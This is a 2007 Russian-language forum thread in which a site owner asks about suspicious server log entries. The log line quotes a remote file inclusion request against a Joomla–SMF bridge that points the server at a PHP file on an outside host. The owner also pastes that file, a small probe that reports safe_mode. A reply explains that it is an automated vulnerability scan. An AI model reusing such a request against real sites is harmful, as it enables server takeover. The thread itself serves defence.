Атака?

Автор ForeverYoung, 28 июня 2007, 08:06:49

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

ForeverYoung

Нахожу в логах сервера несколько запросов такого вида:
70.84.189.194 ___mysite.ru - [28/Jun/2007:05:35:14 +0400] "GET /component/option,com_smf/Itemid,10/topic,128.0//components/com_smf/smf.php?mosConfig_absolute_path=http://www.dezzign.ru/bht.txt? HTTP/1.1" 200 29292 "-" "libwww-perl/5.805"

Смотрю содержимое www.dezzign.ru/bht.txt:
<?php
$SafeMode 
= @ini_get('safe_mode');
if (
$SafeMode == '') { $SafeMode "memex_off"; }
else { 
$SafeMode "memex_on"; } 
echo 
$SafeMode;
?>


Т.е. насколько я могу судить, пока ничего опасного: и запрос неправильный, и код всего-лишь должен выводить состояние Safe Mode. Но ведь просто так никто не будет интересоваться состоянием Safe Mode?
Чего ждать, к чему готовиться? А главное: как готовиться, что проверить у себя для собственного спокойствия?

ForeverYoung

Mavn, спасибо за новый раздел. Имхо давно пора. :)

TL

Цитата: ForeverYoung от 28 июня 2007, 08:06:49
Нахожу в логах сервера несколько запросов такого вида:
70.84.189.194 ___mysite.ru - [28/Jun/2007:05:35:14 +0400] "GET /component/option,com_smf/Itemid,10/topic,128.0//components/com_smf/smf.php?mosConfig_absolute_path=http://www.dezzign.ru/bht.txt? HTTP/1.1" 200 29292 "-" "libwww-perl/5.805"
Робот проверял, не оказался ли ты неудачником с дырявым мостом Joomla-SMF. Если бы он таким запросом считал бы с тебя ответ скрипта, который пытался внедрить, то запомнил бы твой сайт как потенциально уязвимый; и при случае владелец робота впарил бы тебе какую-нибудь гадость на сайт :)